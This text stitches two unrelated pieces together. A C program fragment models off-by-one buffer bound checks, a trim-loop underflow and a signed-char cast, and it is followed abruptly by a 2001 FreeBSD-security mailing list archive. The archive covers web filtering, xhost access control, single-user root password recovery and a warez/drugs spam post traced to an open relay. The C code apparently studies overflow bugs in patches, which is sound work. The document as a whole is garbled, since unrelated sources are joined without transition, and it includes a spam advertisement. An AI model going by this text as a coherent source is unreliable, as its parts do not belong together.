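int arg_int_cast(signed char ch)   { return (int)ch; }
int arg_uchar_cast(signed char ch) { return (unsigned char)ch; }

static int bound_hit(const char *tp, const char *buf, enum bound mode)
{
    switch (mode) {
    case ORIGINAL_GT: return tp >  buf + LOGICAL;      /* test before the patches */
    case PATCH_GE:    return tp >= buf + LOGICAL;      /* ">=" variant */
    default:          return tp >= buf + LOGICAL - 1;  /* "- 1" variant */
    }
}

static size_t past_end(const char *hi, const char *buf)
{
    return hi > buf + LOGICAL ? (size_t)(hi - (buf + LOGICAL)) : 0;
}

/* Copy a value up to ',' or end of input, terminate it, trim trailing space.
 * guard_trim selects the "tp != buf" test on the trim loop. */
struct result copy_value(const char *cp, enum bound mode, int guard_trim)
{
    char store[GUARD + LOGICAL + GUARD];
    char *buf = store + GUARD, *tp = buf, *hi = buf;
    const char *reqend = cp + strlen(cp);
    struct result r = {0, 0, 0, 0};

    memset(store, ' ', sizeof store);   /* spaces before buf: worst case for the trim */
    while (cp < reqend && *cp != ',') {
        *tp++ = *cp++;                  /* store first, test afterwards */
        if (tp > hi)
            hi = tp;
        if (bound_hit(tp, buf, mode)) {
            r.overflow = past_end(hi, buf);
            return r;                   /* rejected */
        }
    }
    *tp = '\0';
    if (tp + 1 > hi)
        hi = tp + 1;
    /* The unguarded loop is stopped at store[0] only to keep this model defined. */
    while ((guard_trim ? tp != buf : tp > store) && isspace((unsigned char)tp[-1]))
        *--tp = '\0';
    r.accepted = 1;
    r.underflow = tp < buf ? (size_t)(buf - tp) : 0;
    r.len = tp < buf ? 0 : (size_t)(tp - buf);
    r.overflow = past_end(hi, buf);
    return r;
}

int main(void)
{
    const char *values[] = { "", "123456", "1234567", "12345678", "123456789" };
    const char *tests[] = { ">", ">=", ">= ... - 1" };

    for (size_t v = 0; v < sizeof values / sizeof values[0]; v++)
        for (int m = ORIGINAL_GT; m <= PATCH_GE_MINUS_1; m++) {
            struct result r = copy_value(values[v], (enum bound)m, 1);
            printf("%zu chars, test %-10s accepted=%d overflow=%zu\n",
                   strlen(values[v]), tests[m], r.accepted, r.overflow);
        }
    printf("empty value, unguarded trim: underflow=%zu\n",
           copy_value("", PATCH_GE, 0).underflow);
    printf("byte 0xE9: (int) gives %d, (unsigned char) gives %d\n",
           arg_int_cast(-23), arg_uchar_cast(-23));
    return 0;
}
```

With an 8-byte buffer the ">" test lets an 8-character value put its terminator one byte past the end, ">=" accepts up to 7 characters, and the "- 1" form stops at 6.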
From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Cy Schubert - ITSD Open Systems Group Cc: Olivier Nicole , uknowho@n0mansland.net, freebsd-security@FreeBSD.ORG Subject: Re: Filtering inappropriate content References: <200103280604.f2S648R14405@cwsys.cwsent.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Cy Schubert - ITSD Open Systems Group wrote: > > In message <200103280405.LAA16283@banyan.cs.ait.ac.th>, Olivier Nicole > writes: > > >The organization is looking to filter web content only. Apolgies for > > >the confusion. > > > > Squid has some rules to do contents filtering I guess. > > I tried it. Squid is not all that effective. For example, matching > expressions can be found in perfectly legitimate URL's, e.g. a sun.com > web page has the character string "sex" in it (I think it was a Virtual > Adrien component called RICHPsex), so my filter blocked it. I'm sure > that operators of web sites that you want to block could name their > files and directories with non-offending names, bypassing your filter. > A squid filter may not have the desired effect. > > The only solution I can think of that works is to subscribe to a > service that maintains a database of offending sites. Real-time analysis is much more effective. Visit the RuleSpace site for information on a commercial SDK that can do this on FreeBSD. http://www.rulespace.com/contexion/products/eatk/ -- "Where am I, and what am I doing in this handbasket?" 
Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 3:34:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from q3.cybg.com (digex-ext.cybg.com [209.119.171.80]) by hub.freebsd.org (Postfix) with SMTP id 957BB37B422 for ; Fri, 6 Apr 2001 03:34:37 -0700 (PDT) (envelope-from kreed@cyberguard.com) Message-ID: From: Kirk Reed To: "'|[TDP]| '" , "'freebsd-security@freebsd.org '" Subject: Unsubscribe Date: Fri, 6 Apr 2001 06:34:42 -0400 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org unsubscribe tdp@psynet.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 5: 6:17 2001 Delivered-To: freebsd-security@freebsd.org Received: from relay.ioffe.rssi.ru (relay.ioffe.rssi.ru [194.85.224.33]) by hub.freebsd.org (Postfix) with ESMTP id 2C25937B424 for ; Fri, 6 Apr 2001 05:06:03 -0700 (PDT) (envelope-from kopts@astro.ioffe.rssi.ru) Received: from astro.ioffe.rssi.ru (astro.ioffe.rssi.ru [194.85.229.130]) by relay.ioffe.rssi.ru (8.9.1/8.9.1) with ESMTP id QAA09337; Fri, 6 Apr 2001 16:05:42 +0400 (MSD) Received: by astro.ioffe.rssi.ru (8.9.3/Clnt-2.14-AS-eef) id QAA52712; Fri, 6 Apr 2001 16:05:32 +0400 (MSD) Date: Fri, 6 Apr 2001 16:05:32 +0400 (MSD) 
From: Alexey Koptsevich To: Per Kristian Hove , Johan Danielsson Cc: freebsd-security@FreeBSD.ORG Subject: Re: Disabling xhost(1) Access Control In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, > | If you want to do that there are at least two places you have to > | change the behaviour in programs/Xserver/os/access.c: > | > | * for the `xhost +' case change ChangeAccessControl(), to only succeed > | for the enable case (paranoid people use `xhost -' routinely). > | > | * for `xhost +host' change AddHost() to your liking (ifdef out > | FamilyInternet). > > If you're paranoid, you should also change the default behaviour > of InvalidHost() [also in access.c] to return 1 instead of 0 if > AccessEnabled isn't set [if you're running with `xhost +', that > is]. This is where the access check actually takes place. Sorry, could you write what exactly should I change in the code? Thanks a lot, Alex To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 5:55:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns1.unila.ac.id (ns1.unila.ac.id [202.158.47.162]) by hub.freebsd.org (Postfix) with SMTP id 3745D37B422 for ; Fri, 6 Apr 2001 05:55:16 -0700 (PDT) (envelope-from riki@maiser.unila.ac.id) Received: (qmail 1590 invoked from network); 6 Apr 2001 12:58:04 -0000 Received: from maiser.unila.ac.id (192.168.1.2) by ns1.unila.ac.id with SMTP; 6 Apr 2001 12:58:04 -0000 Received: from localhost (riki@localhost) by mail.unila.ac.id (8.9.3/8.9.3) with ESMTP id TAA58470 for ; Fri, 6 Apr 2001 19:46:26 +0700 (JAVT) (envelope-from riki@maiser.unila.ac.id) Date: Fri, 6 Apr 2001 19:46:26 +0700 (JAVT) 
From: Q Yai QQ To: security@FreeBSD.org Subject: Re: ntpd patch In-Reply-To: <20010406123444.F66243@gsmx07.alcatel.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi guys,.. usually,.i use user toor as my back up root,.. but,.. i forgot,.. how the trouble shooter if i forgot root's passwd i try to boot -s my computer,... then,.. when i type #passwd root or #vipw or #vi master.passwd the commands are not found.... can u help me guys,.. to explain step by steps,..?? thank's a lot,.. >>>>>>>>>>>>>>>>>*****<<<<<<<<<<<<<<<<< riki@unila.ac.id visit my homepage and sign my guestbook http://unilanet.unila.ac.id/~qq --------------------------------------- --------------------------------------- & __& &__ // \\ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 6: 2:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 4A25D37B423 for ; Fri, 6 Apr 2001 06:02:30 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 1581 invoked by uid 1000); 6 Apr 2001 13:01:16 -0000 Date: Fri, 6 Apr 2001 16:01:16 +0300 
From: Peter Pentchev To: Q Yai QQ Cc: security@FreeBSD.org Subject: Re: ntpd patch Message-ID: <20010406160116.E447@ringworld.oblivion.bg> Mail-Followup-To: Q Yai QQ , security@FreeBSD.org References: <20010406123444.F66243@gsmx07.alcatel.com.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from riki@maiser.unila.ac.id on Fri, Apr 06, 2001 at 07:46:26PM +0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Apr 06, 2001 at 07:46:26PM +0700, Q Yai QQ wrote: > hi guys,.. > > usually,.i use user toor as my back up root,.. > > but,.. i forgot,.. > how the trouble shooter if i forgot root's passwd > > i try to boot -s my computer,... > > > then,.. when i type #passwd root > or #vipw > or #vi master.passwd > > the commands are not found.... > > can u help me guys,.. > to explain step by steps,..?? > > thank's a lot,.. The commands are not found for one of two possible reasons - you have not mounted the /usr filesystem, or /usr/bin is not in your path. You can work around those by executing the following commands after the boot -s mount /usr mount -u -o rw / PATH=/usr/sbin:/usr/bin:$PATH export PATH EDITOR=/usr/bin/vi reboot That should be enough. G'luck, Peter -- I am jealous of the first word in this sentence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 6: 6:41 2001 Delivered-To: freebsd-security@freebsd.org Received: from peitho.fxp.org (peitho.fxp.org [209.26.95.40]) by hub.freebsd.org (Postfix) with ESMTP id AB6DD37B42C for ; Fri, 6 Apr 2001 06:06:34 -0700 (PDT) (envelope-from cdf.lists@fxp.org) Received: by peitho.fxp.org (Postfix, from userid 1501) id A40AC1360C; Fri, 6 Apr 2001 09:06:55 -0400 (EDT) Date: Fri, 6 Apr 2001 09:06:55 -0400 
From: Chris Faulhaber To: Q Yai QQ Cc: security@FreeBSD.org Subject: Re: ntpd patch Message-ID: <20010406090655.A97168@peitho.fxp.org> References: <20010406123444.F66243@gsmx07.alcatel.com.au> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="KsGdsel6WgEHnImy" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from riki@maiser.unila.ac.id on Fri, Apr 06, 2001 at 07:46:26PM +0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --KsGdsel6WgEHnImy Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Fri, Apr 06, 2001 at 07:46:26PM +0700, Q Yai QQ wrote: > hi guys,.. >=20 > usually,.i use user toor as my back up root,.. >=20 > but,.. i forgot,.. > how the trouble shooter if i forgot root's passwd=20 >=20 > i try to boot -s my computer,... >=20 >=20 > then,.. when i type #passwd root=20 > or #vipw > or #vi master.passwd=20 >=20 > the commands are not found.... >=20 > can u help me guys,.. > to explain step by steps,..?? >=20 http://www.FreeBSD.org/FAQ/admin.html#FORGOT-ROOT-PW --=20 Chris D. 
Faulhaber - jedgar@fxp.org - jedgar@FreeBSD.org -------------------------------------------------------- FreeBSD: The Power To Serve - http://www.FreeBSD.org --KsGdsel6WgEHnImy-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 9:37:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from pop162-leg.mail.com (pop162-leg.mail.com [165.251.32.54]) by hub.freebsd.org (Postfix) with ESMTP id 3A1E537B43E for ; Fri, 6 Apr 2001 09:37:55 -0700 (PDT) (envelope-from megasitez@Iname.com) Received: from Iname.com (pD950C5AE.dip.t-dialin.net [217.80.197.174]) by pop162-leg.mail.com (Postfix) with SMTP id C49061C83B for ; Fri, 6 Apr 2001 12:37:53 -0400 (EDT)
From: To: Subject: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs Message-Id: <20010406163753.C49061C83B@pop162-leg.mail.com> Date: Fri, 6 Apr 2001 12:37:53 -0400 (EDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi Warezfreak, ENJOY a brandnew MEGASITEZ Toplist with Warez,Free XXX, Drugs and many more ... http://www.hf2001.de/topsites/topsites.html the Mega-Sitez Team Team To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 9:47:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from R181204.resnet.ucsb.edu (R181204.resnet.ucsb.edu [128.111.181.204]) by hub.freebsd.org (Postfix) with ESMTP id 2934137B496 for ; Fri, 6 Apr 2001 09:47:43 -0700 (PDT) (envelope-from mudman@R181204.resnet.ucsb.edu) Received: from localhost (mudman@localhost) by R181204.resnet.ucsb.edu (8.11.1/8.11.1) with ESMTP id f36Gr1804720; Fri, 6 Apr 2001 09:53:01 -0700 (PDT) (envelope-from mudman@R181204.resnet.ucsb.edu) Date: Fri, 6 Apr 2001 09:53:01 -0700 (PDT) 
From: mudman To: Cc: Subject: Re: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs In-Reply-To: <20010406163753.C49061C83B@pop162-leg.mail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > ENJOY a brandnew MEGASITEZ Toplist with Warez,Free XXX, Drugs and many more ... This is a gross abuse of this list. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 10: 9:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from sherline.com (sherline.net [216.120.87.2]) by hub.freebsd.org (Postfix) with SMTP id 6F14537B42C for ; Fri, 6 Apr 2001 10:09:03 -0700 (PDT) (envelope-from jgowdy@home.com) Received: (qmail 21793 invoked from network); 6 Apr 2001 17:08:56 -0000 Received: from unknown (HELO server2) (216.120.87.3) by 216.120.87.2 with SMTP; 6 Apr 2001 17:08:56 -0000 Message-ID: <001301c0bebc$44e39af0$035778d8@sherline.net> 
From: "Jeremiah Gowdy" To: "mudman" , Cc: References: Subject: Re: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs Date: Fri, 6 Apr 2001 10:08:56 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4133.2400 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > ENJOY a brandnew MEGASITEZ Toplist with Warez,Free XXX, Drugs and many more ... > > This is a gross abuse of this list. It's a massive crosspost too. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 10:13:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id D08A537B43E for ; Fri, 6 Apr 2001 10:13:40 -0700 (PDT) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (1066 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Fri, 6 Apr 2001 12:13:15 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Fri, 6 Apr 2001 12:13:15 -0500 (CDT) From: James Wyatt Cc: freebsd-security@FreeBSD.org Subject: Re: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs In-Reply-To: <20010406163753.C49061C83B@pop162-leg.mail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 6 Apr 2001 megasitez@Iname.com wrote: > Date: Fri, 6 Apr 2001 12:37:53 -0400 (EDT) 
> From: megasitez@Iname.com
> To: freebsd-security@FreeBSD.org
> Subject: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs
>
> hi Warezfreak,
>
> ENJOY a brandnew MEGASITEZ Toplist with Warez,Free XXX, Drugs and many more ...
>
> http://www.hf2001.de/topsites/topsites.html
>
> the Mega-Sitez Team Team

This is definitely OT, it's a Linux system. I'll have to look later to see
if it has any FreeBSD RootKits. (^_^)

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Apr 6 11: 0:26 2001
Delivered-To: freebsd-security@freebsd.org
Received: from C126508-B.rchdsn1.tx.home.com (c126508-b.rchdsn1.tx.home.com [24.7.19.88]) by hub.freebsd.org (Postfix) with ESMTP id EC0F637B506 for ; Fri, 6 Apr 2001 11:00:18 -0700 (PDT) (envelope-from jdunfee@C126508-B.rchdsn1.tx.home.com)
Received: (from jdunfee@localhost) by C126508-B.rchdsn1.tx.home.com (8.11.1/8.11.1) id f36IGMp52718; Fri, 6 Apr 2001 13:16:22 -0500 (CDT) (envelope-from jdunfee)
From: "Jonathan D. Dunfee" MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15054.2037.824828.10539@C126508-B.rchdsn1.tx.home.com> Date: Fri, 6 Apr 2001 13:16:21 -0500 (CDT) To: freebsd-security@FreeBSD.ORG Cc: jdunfee@acm.org Subject: Re: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs In-Reply-To: References: <20010406163753.C49061C83B@pop162-leg.mail.com> X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid Reply-To: Jonathan Dunfee Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On a slightly different thread, has anyone checked to see if this is coming directly from iname.com or if that place is being used as a relay? Either way someone should probably drop a dime on and request that stop this. I'm a little new at this, but it looks like it was forwarded by pop162-leg.mail.com (165.251.32.54) for pD950C5AE.dip.t-dialin.net (217.80.197.174). I check and pop162-leg.mail.com is definitely relaying mail. Is there someone who takes care of this? Jon James Wyatt writes: > On Fri, 6 Apr 2001 megasitez@Iname.com wrote: > > Date: Fri, 6 Apr 2001 12:37:53 -0400 (EDT) 
> > From: megasitez@Iname.com > > To: freebsd-security@FreeBSD.org > > Subject: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs > > > > hi Warezfreak, > > > > ENJOY a brandnew MEGASITEZ Toplist with Warez,Free XXX, Drugs and many more ... > > > > http://www.hf2001.de/topsites/topsites.html > > > > the Mega-Sitez Team Team > > This is definately OT, it's a Linux system. I'll have to look later to see > if it has any FreeBSD RootKits. (^_^) > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Jonathan D. Dunfee jdunfee@acm.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 11: 7:28 2001 Delivered-To: freebsd-security@freebsd.org Received: from poontang.schulte.org (poontang.schulte.org [209.134.156.197]) by hub.freebsd.org (Postfix) with ESMTP id 5FA5D37B424 for ; Fri, 6 Apr 2001 11:07:25 -0700 (PDT) (envelope-from christopher@schulte.org) Received: from schulte-laptop.schulte.org ([64.183.199.40]) by poontang.schulte.org (8.12.0.Beta5/8.12.0.Beta5) with ESMTP id f36I7IIr070257; Fri, 6 Apr 2001 13:07:18 -0500 (CDT) Message-Id: <5.0.2.1.0.20010406130157.02e2f3f0@pop.schulte.org> X-Sender: schulte@pop.schulte.org X-Mailer: QUALCOMM Windows Eudora Version 5.0.2 Date: Fri, 06 Apr 2001 13:06:52 -0500 To: Jonathan Dunfee , freebsd-security@FreeBSD.ORG 
From: Christopher Schulte Subject: Re: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs Cc: jdunfee@acm.org In-Reply-To: <15054.2037.824828.10539@C126508-B.rchdsn1.tx.home.com> References: <20010406163753.C49061C83B@pop162-leg.mail.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 01:16 PM 4/6/2001 -0500, Jonathan D. Dunfee wrote: >I check and pop162-leg.mail.com is definitely relaying >mail. I generally don't reply re: 'spam' on mailing lists, but this question is valid and should be answered: >Is there someone who takes care of this? http://www.mail-abuse.org/ RSS runs a database of open relays which are reported to them by the Internet community. They operate a 'DNS BLACKLIST' where mail admins can add hooks into their MTAs which will check every incoming smtp connection and see if RSS has listed the box as an open relay. Such messages are discarded before they ever hit a user's spool. There are other such lists of this nature... ORBS being the biggest one that I can think of. >Jon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 11:13:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id AEE7037B422 for ; Fri, 6 Apr 2001 11:13:15 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f36ID9e31819; Fri, 6 Apr 2001 14:13:09 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Fri, 6 Apr 2001 14:13:05 -0400 (EDT) 
From: Rob Simmons To: "Jonathan D. Dunfee" Cc: , Subject: Re: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs In-Reply-To: <15054.2037.824828.10539@C126508-B.rchdsn1.tx.home.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 The originating IP is 217.80.197.174 and its owned by t-online.de Their info is: address: T-Online International AG address: Waldstrasse 3 address: 64331 Weiterstadt address: DE e-mail: d.kaufmann@t-online.net address: Deutsche Telekom Online Service GmbH address: Waldstrasse 3 address: 64331 Weiterstadt address: DE phone: +49 6151 680 537 fax-no: +49 6151 680 519 e-mail: hostmaster@t-online.net The IP that relayed the mail is 165.251.32.54 and it is an open relay. Its already blocked by ORBS right now. It is run by mail.com and they don't care, so good luck getting them to fix it. Here is the contact info for mail.com: iName, Inc. 11 Broadway, Suite 660 New York, NY 10004 US 212-425-3477 Good Luck! Robert Simmons Systems Administrator http://www.wlcg.com/ On Fri, 6 Apr 2001, Jonathan D. Dunfee wrote: > > On a slightly different thread, has anyone checked to > see if this is coming directly from iname.com or if that > place is being used as a relay? Either way someone should > probably drop a dime on and request that stop this. > > I'm a little new at this, but it looks like it was > forwarded by pop162-leg.mail.com (165.251.32.54) for > pD950C5AE.dip.t-dialin.net (217.80.197.174). > > I check and pop162-leg.mail.com is definitely relaying > mail. > > Is there someone who takes care of this? > > > Jon > > James Wyatt writes: > > On Fri, 6 Apr 2001 megasitez@Iname.com wrote: > > > Date: Fri, 6 Apr 2001 12:37:53 -0400 (EDT) 
> > > From: megasitez@Iname.com > > > To: freebsd-security@FreeBSD.org > > > Subject: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs > > > > > > hi Warezfreak, > > > > > > ENJOY a brandnew MEGASITEZ Toplist with Warez,Free XXX, Drugs and many more ... > > > > > > http://www.hf2001.de/topsites/topsites.html > > > > > > the Mega-Sitez Team Team > > > > This is definately OT, it's a Linux system. I'll have to look later to see > > if it has any FreeBSD RootKits. (^_^) > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > -- > > Jonathan D. Dunfee > jdunfee@acm.org > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6zgc0v8Bofna59hYRA+HfAJ9aovVApqpDHGnLRmEzQseoOkzEYACbBwty BphRX7te/xDMQ96l8eDJlkI= =OGQ9 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 11:14:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [207.226.17.4]) by hub.freebsd.org (Postfix) with ESMTP id C662837B43C for ; Fri, 6 Apr 2001 11:14:52 -0700 (PDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.3/8.11.3) with ESMTP id f36IEZS31886; Fri, 6 Apr 2001 14:14:35 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Date: Fri, 6 Apr 2001 14:14:32 -0400 (EDT) 
From: Rob Simmons To: Christopher Schulte Cc: Jonathan Dunfee , , Subject: Re: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs In-Reply-To: <5.0.2.1.0.20010406130157.02e2f3f0@pop.schulte.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 http://spamcop.net is another good site for this. Robert Simmons Systems Administrator http://www.wlcg.com/ On Fri, 6 Apr 2001, Christopher Schulte wrote: > At 01:16 PM 4/6/2001 -0500, Jonathan D. Dunfee wrote: > >I check and pop162-leg.mail.com is definitely relaying > >mail. > > I generally don't reply re: 'spam' on mailing lists, but this question is > valid and should be answered: > > >Is there someone who takes care of this? > > http://www.mail-abuse.org/ > > RSS runs a database of open relays which are reported to them by the > Internet community. > > They operate a 'DNS BLACKLIST' where mail admins can add hooks into their > MTAs which will check every incoming smtp connection and see if RSS has > listed the box as an open relay. Such messages are discarded before they > ever hit a user's spool. > > There are other such lists of this nature... ORBS being the biggest one > that I can think of. 
> > >Jon > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE6zgeLv8Bofna59hYRA1rmAJkBFHSfl2H+JW8RP39WeSWnkeUIxwCff+FY dY0WLcS4PjlqmBmaHMoJ5UY= =pBRl -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 6 11:17:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from eagle.capis.com (eagle-gw.capis.com [207.76.160.3]) by hub.freebsd.org (Postfix) with ESMTP id 902EF37B422 for ; Fri, 6 Apr 2001 11:17:44 -0700 (PDT) (envelope-from jdunfee@capis.com) Received: from hornet.capis.com (hornet.capis.com [192.189.243.13]) by eagle.capis.com (AIX4.3/UCB 8.8.8/8.8.8) with ESMTP id OAA19546 for ; Fri, 6 Apr 2001 14:17:42 -0400 Received: from tomcat.capis.com (unverified) by hornet.capis.com (Content Technologies SMTPRS 4.1.2) with ESMTP id ; Fri, 6 Apr 2001 13:17:38 -0500 Received: from wkstn195.capis.com ([192.168.130.195]) by tomcat.capis.com (Lotus Domino Release 5.0.2c) with ESMTP id 2001040613163905:12270 ; Fri, 6 Apr 2001 13:16:39 -0500 Received: (from jdunfee@localhost) by wkstn195.capis.com (8.11.0/8.11.0) id f36IO9W18372; Fri, 6 Apr 2001 13:24:09 -0500 X-Authentication-Warning: wkstn195.capis.com: jdunfee set sender to jdunfee@capis.com using -f X-Mailer: 21.1 (patch 12) "Channel Islands" XEmacs Lucid (via feedmail 8 I); VM 6.72 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid 
From: "Jonathan D. Dunfee"
MIME-Version: 1.0
Message-ID: <15054.2505.82150.548911@wkstn195.capis.com>
Date: Fri, 6 Apr 2001 13:24:09 -0500 (CDT)
To: Christopher Schulte
Cc: freebsd-security@freebsd.org
Subject: Re: brandnew MEGA-SITEZ Toplist - Warez, Free-XXX, Drugs
In-Reply-To: <5.0.2.1.0.20010406130157.02e2f3f0@pop.schulte.org>
References: <20010406163753.C49061C83B@pop162-leg.mail.com> <5.0.2.1.0.20010406130157.02e2f3f0@pop.schulte.org>
Reply-To: Jonathan Dunfee
X-MIMETrack: Itemize by SMTP Server on Tomcat/CIS(Release 5.0.2c |February 2, 2000) at 04/06/2001 01:16:39 PM, Serialize by Router on Tomcat/CIS(Release 5.0.2c |February 2, 2000) at 04/06/2001 01:16:39 PM, Serialize complete at 04/06/2001 01:16:39 PM
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
